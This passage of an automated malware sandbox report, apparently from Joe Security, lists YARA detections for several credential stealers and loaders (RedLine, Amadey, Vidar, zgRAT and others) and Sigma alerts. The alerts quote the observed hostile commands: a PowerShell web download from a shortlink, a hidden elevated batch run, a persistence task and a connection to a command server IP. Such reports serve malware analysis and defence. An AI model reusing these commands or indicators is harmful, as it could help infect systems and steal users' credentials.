00000021.00000002.2007530947.0000000002521000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000021.00000002.2007530947.0000000002521000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x204:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000000.1715094971.0000000000081000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: 1Vkf7silOj.exe PID: 6620	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 1Vkf7silOj.exe PID: 6620	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: gold.exe PID: 7752	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7772	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: alex5555555.exe PID: 8560	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 8588	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 123.exe PID: 8716	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 123.exe PID: 8716	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: svhosts.exe PID: 8744	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svhosts.exe PID: 8744	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 8196	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 8196	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 8196	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 54 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
37.2.RegAsm.exe.572b7e.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
37.2.RegAsm.exe.572b7e.1.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x11b07:$a1: get_encrypted_key 0x11209:$a2: get_PassedPaths 0xfc2a:$a3: ChromeGetLocalName 0x1140a:$a4: GetBrowsers 0x17e34:$a5: Software\Valve\SteamLogin Data 0x176d4:$a6: %appdata%\ 0x10f2e:$a7: ScanPasswords
37.2.RegAsm.exe.572b7e.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x180a4:$pat14: , CommandLine: 0x110da:$v2_1: ListOfProcesses 0x10e9a:$v4_3: base64str 0x11ad5:$v4_4: stringKey 0xf63f:$v4_5: BytesToStringConverted 0xe73a:$v4_6: FromBase64 0xfbb2:$v4_8: procName 0xfec8:$v5_1: DownloadAndExecuteUpdate 0x10d71:$v5_2: ITaskProcessor 0xfeb6:$v5_3: CommandLineUpdate 0xfea7:$v5_4: DownloadUpdate 0x102ad:$v5_5: FileScanning 0xf860:$v5_7: RecordHeaderField 0xf4c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
20.2.Hkbsse.exe.80000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
42.0.Explorers.exe.230000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
42.0.Explorers.exe.230000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
42.0.Explorers.exe.230000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x457bf:$s1: file:/// 0x4571b:$s2: {11111-22222-10009-11112} 0x4574f:$s3: {11111-22222-50001-00000} 0x426c9:$s4: get_Module 0x3ced3:$s5: Reverse 0x3db7b:$s6: BlockCopy 0x3ce3e:$s7: ReadByte 0x457d1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
41.0.svhosts.exe.870000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
37.2.RegAsm.exe.3e79190.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
37.2.RegAsm.exe.4579ec.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.2.ldr.exe.d50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
37.2.RegAsm.exe.4579ec.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
36.2.alex5555555.exe.a1fda6.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
36.2.alex5555555.exe.a1fda6.3.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x11b07:$a1: get_encrypted_key 0x11209:$a2: get_PassedPaths 0xfc2a:$a3: ChromeGetLocalName 0x1140a:$a4: GetBrowsers 0x17e34:$a5: Software\Valve\SteamLogin Data 0x176d4:$a6: %appdata%\ 0x10f2e:$a7: ScanPasswords
36.2.alex5555555.exe.a1fda6.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x180a4:$pat14: , CommandLine: 0x110da:$v2_1: ListOfProcesses 0x10e9a:$v4_3: base64str 0x11ad5:$v4_4: stringKey 0xf63f:$v4_5: BytesToStringConverted 0xe73a:$v4_6: FromBase64 0xfbb2:$v4_8: procName 0xfec8:$v5_1: DownloadAndExecuteUpdate 0x10d71:$v5_2: ITaskProcessor 0xfeb6:$v5_3: CommandLineUpdate 0xfea7:$v5_4: DownloadUpdate 0x102ad:$v5_5: FileScanning 0xf860:$v5_7: RecordHeaderField 0xf4c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
20.0.Hkbsse.exe.80000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
36.2.alex5555555.exe.a1fda6.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
36.2.alex5555555.exe.a1fda6.3.raw.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13707:$a1: get_encrypted_key 0x12e09:$a2: get_PassedPaths 0x1182a:$a3: ChromeGetLocalName 0x1300a:$a4: GetBrowsers 0x19a34:$a5: Software\Valve\SteamLogin Data 0x192d4:$a6: %appdata%\ 0x12b2e:$a7: ScanPasswords
36.2.alex5555555.exe.a1fda6.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x19ca4:$pat14: , CommandLine: 0x12cda:$v2_1: ListOfProcesses 0x12a9a:$v4_3: base64str 0x136d5:$v4_4: stringKey 0x1123f:$v4_5: BytesToStringConverted 0x1033a:$v4_6: FromBase64 0x117b2:$v4_8: procName 0x11ac8:$v5_1: DownloadAndExecuteUpdate 0x12971:$v5_2: ITaskProcessor 0x11ab6:$v5_3: CommandLineUpdate 0x11aa7:$v5_4: DownloadUpdate 0x11ead:$v5_5: FileScanning 0x11460:$v5_7: RecordHeaderField 0x110c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
35.2.Hkbsse.exe.6d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
12.2.gold.exe.150000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
52.2.TpWWMUpe0LEV.exe.6b6ee000.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
37.2.RegAsm.exe.572b7e.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
52.2.TpWWMUpe0LEV.exe.6b6ee000.2.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
37.2.RegAsm.exe.572b7e.1.raw.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x13707:$a1: get_encrypted_key 0x12e09:$a2: get_PassedPaths 0x1182a:$a3: ChromeGetLocalName 0x1300a:$a4: GetBrowsers 0x19a34:$a5: Software\Valve\SteamLogin Data 0x192d4:$a6: %appdata%\ 0x12b2e:$a7: ScanPasswords
37.2.RegAsm.exe.572b7e.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x19ca4:$pat14: , CommandLine: 0x12cda:$v2_1: ListOfProcesses 0x12a9a:$v4_3: base64str 0x136d5:$v4_4: stringKey 0x1123f:$v4_5: BytesToStringConverted 0x1033a:$v4_6: FromBase64 0x117b2:$v4_8: procName 0x11ac8:$v5_1: DownloadAndExecuteUpdate 0x12971:$v5_2: ITaskProcessor 0x11ab6:$v5_3: CommandLineUpdate 0x11aa7:$v5_4: DownloadUpdate 0x11ead:$v5_5: FileScanning 0x11460:$v5_7: RecordHeaderField 0x110c8:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
10.2.axplong.exe.6b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
36.2.alex5555555.exe.904c14.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
36.2.alex5555555.exe.904c14.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
18.0.NewLatest.exe.5f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
36.2.alex5555555.exe.8b100f.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
36.2.alex5555555.exe.8b100f.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
36.2.alex5555555.exe.8b100f.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
36.2.alex5555555.exe.8b100f.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x457bf:$s1: file:/// 0x4571b:$s2: {11111-22222-10009-11112} 0x4574f:$s3: {11111-22222-50001-00000} 0x426c9:$s4: get_Module 0x3ced3:$s5: Reverse 0x7316c:$s5: Reverse 0x3db7b:$s6: BlockCopy 0x3ce3e:$s7: ReadByte 0x457d1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
37.2.RegAsm.exe.3e25570.5.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
37.2.RegAsm.exe.3e25570.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
37.2.RegAsm.exe.3e25570.5.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x439bf:$s1: file:/// 0x4391b:$s2: {11111-22222-10009-11112} 0x4394f:$s3: {11111-22222-50001-00000} 0x408c9:$s4: get_Module 0x3b0d3:$s5: Reverse 0x3bd7b:$s6: BlockCopy 0x3b03e:$s7: ReadByte 0x439d1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
54.2.aspnet_regiis.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
54.2.aspnet_regiis.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
54.2.aspnet_regiis.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
54.2.aspnet_regiis.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
37.2.RegAsm.exe.3e79190.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
18.2.NewLatest.exe.5f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
32.0.ldr.exe.d50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
52.2.TpWWMUpe0LEV.exe.6b6d0000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
52.2.TpWWMUpe0LEV.exe.6b6d0000.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
19.2.Hkbsse.exe.80000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
37.2.RegAsm.exe.403de7.2.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
37.2.RegAsm.exe.403de7.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
37.2.RegAsm.exe.403de7.2.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x439bf:$s1: file:/// 0x4391b:$s2: {11111-22222-10009-11112} 0x4394f:$s3: {11111-22222-50001-00000} 0x408c9:$s4: get_Module 0x3b0d3:$s5: Reverse 0x3bd7b:$s6: BlockCopy 0x3b03e:$s7: ReadByte 0x439d1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
9.2.7.exe.c50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.0.1Vkf7silOj.exe.930000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
35.0.Hkbsse.exe.6d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
36.2.alex5555555.exe.8b100f.2.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
36.2.alex5555555.exe.8b100f.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
36.2.alex5555555.exe.8b100f.2.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x439bf:$s1: file:/// 0x4391b:$s2: {11111-22222-10009-11112} 0x4394f:$s3: {11111-22222-50001-00000} 0x408c9:$s4: get_Module 0x3b0d3:$s5: Reverse 0x3bd7b:$s6: BlockCopy 0x3b03e:$s7: ReadByte 0x439d1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
37.2.RegAsm.exe.403de7.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
37.2.RegAsm.exe.403de7.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
37.2.RegAsm.exe.403de7.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
37.2.RegAsm.exe.403de7.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x457bf:$s1: file:/// 0x4571b:$s2: {11111-22222-10009-11112} 0x4574f:$s3: {11111-22222-50001-00000} 0x426c9:$s4: get_Module 0x3ced3:$s5: Reverse 0x7316c:$s5: Reverse 0x3db7b:$s6: BlockCopy 0x3ce3e:$s7: ReadByte 0x457d1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
37.2.RegAsm.exe.3e25570.5.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
37.2.RegAsm.exe.3e25570.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
37.2.RegAsm.exe.3e25570.5.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
37.2.RegAsm.exe.3e25570.5.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x457bf:$s1: file:/// 0x4571b:$s2: {11111-22222-10009-11112} 0x4574f:$s3: {11111-22222-50001-00000} 0x426c9:$s4: get_Module 0x3ced3:$s5: Reverse 0x73187:$s5: Reverse 0x3db7b:$s6: BlockCopy 0x3ce3e:$s7: ReadByte 0x457d1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
19.0.Hkbsse.exe.80000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.2.axplong.exe.6b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
37.2.RegAsm.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
37.2.RegAsm.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
37.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
37.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x789de:$a1: get_encrypted_key 0x184485:$a1: get_encrypted_key 0x183b87:$a2: get_PassedPaths 0x74d57:$a3: ChromeGetLocalName 0x1825a8:$a3: ChromeGetLocalName 0x41116:$a4: GetBrowsers 0x77aa4:$a4: GetBrowsers 0x183d88:$a4: GetBrowsers 0x81e04:$a5: Software\Valve\SteamLogin Data 0x18a7b2:$a5: Software\Valve\SteamLogin Data 0x80604:$a6: %appdata%\ 0x18a052:$a6: %appdata%\ 0x1838ac:$a7: ScanPasswords
37.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x82e1c:$pat14: , CommandLine: 0x18aa22:$pat14: , CommandLine: 0x4117d:$v2_1: ListOfProcesses 0x183a58:$v2_1: ListOfProcesses 0x3f90b:$v4_3: base64str 0x7722c:$v4_3: base64str 0x183818:$v4_3: base64str 0x3f8e9:$v4_4: stringKey 0x7897f:$v4_4: stringKey 0x184453:$v4_4: stringKey 0x3f915:$v4_5: BytesToStringConverted 0x742d6:$v4_5: BytesToStringConverted 0x181fbd:$v4_5: BytesToStringConverted 0x3f900:$v4_6: FromBase64 0x72555:$v4_6: FromBase64 0x1810b8:$v4_6: FromBase64 0x182530:$v4_8: procName 0x751c8:$v5_1: DownloadAndExecuteUpdate 0x182846:$v5_1: DownloadAndExecuteUpdate 0x1836ef:$v5_2: ITaskProcessor 0x182834:$v5_3: CommandLineUpdate
37.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x477a6:$s1: file:/// 0x47702:$s2: {11111-22222-10009-11112} 0x47736:$s3: {11111-22222-50001-00000} 0x446b0:$s4: get_Module 0x3eeba:$s5: Reverse 0x75153:$s5: Reverse 0x1827ea:$s5: Reverse 0x3fb62:$s6: BlockCopy 0x1844fc:$s6: BlockCopy 0x3ee25:$s7: ReadByte 0x477b8:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
36.2.alex5555555.exe.880000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
36.2.alex5555555.exe.880000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
36.2.alex5555555.exe.880000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
36.2.alex5555555.exe.880000.0.unpack	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0xa5406:$a1: get_encrypted_key 0x1b0ead:$a1: get_encrypted_key 0x1b05af:$a2: get_PassedPaths 0xa177f:$a3: ChromeGetLocalName 0x1aefd0:$a3: ChromeGetLocalName 0x6db3e:$a4: GetBrowsers 0xa44cc:$a4: GetBrowsers 0x1b07b0:$a4: GetBrowsers 0xae82c:$a5: Software\Valve\SteamLogin Data 0x1b71da:$a5: Software\Valve\SteamLogin Data 0xad02c:$a6: %appdata%\ 0x1b6a7a:$a6: %appdata%\ 0x1b02d4:$a7: ScanPasswords
36.2.alex5555555.exe.880000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x23338:$s5: delete[] 0xaf844:$pat14: , CommandLine: 0x1b744a:$pat14: , CommandLine: 0x6dba5:$v2_1: ListOfProcesses 0x1b0480:$v2_1: ListOfProcesses 0x6c333:$v4_3: base64str 0xa3c54:$v4_3: base64str 0x1b0240:$v4_3: base64str 0x6c311:$v4_4: stringKey 0xa53a7:$v4_4: stringKey 0x1b0e7b:$v4_4: stringKey 0x6c33d:$v4_5: BytesToStringConverted 0xa0cfe:$v4_5: BytesToStringConverted 0x1ae9e5:$v4_5: BytesToStringConverted 0x6c328:$v4_6: FromBase64 0x9ef7d:$v4_6: FromBase64 0x1adae0:$v4_6: FromBase64 0x1aef58:$v4_8: procName 0xa1bf0:$v5_1: DownloadAndExecuteUpdate 0x1af26e:$v5_1: DownloadAndExecuteUpdate 0x1b0117:$v5_2: ITaskProcessor
36.2.alex5555555.exe.880000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x741ce:$s1: file:/// 0x7412a:$s2: {11111-22222-10009-11112} 0x7415e:$s3: {11111-22222-50001-00000} 0x710d8:$s4: get_Module 0x6b8e2:$s5: Reverse 0xa1b7b:$s5: Reverse 0x1af212:$s5: Reverse 0x6c58a:$s6: BlockCopy 0x1b0f24:$s6: BlockCopy 0x6b84d:$s7: ReadByte 0x741e0:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 76 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden", CommandLine: powershell -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c ins.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden", ProcessId: 8432, ProcessName: powershell.exe

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 43.153.49.49, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe, Initiated: true, ProcessId: 8080, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49761

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe, ProcessId: 7900, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c ins.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", ProcessId: 7888, ProcessName: powershell.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00 , CommandLine: schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00 , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\install.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8804, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00 , ProcessId: 9128, ProcessName: schtasks.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c ins.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null", ProcessId: 7888, ProcessName: powershell.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\6.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\6.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\6.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\6.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\6.exe, ParentCommandLine: "C:\Users\user\Desktop\1Vkf7silOj.exe", ParentImage: C:\Users\user\Desktop\1Vkf7silOj.exe, ParentProcessId: 6620, ParentProcessName: 1Vkf7silOj.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\6.exe" , ProcessId: 7776, ProcessName: 6.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

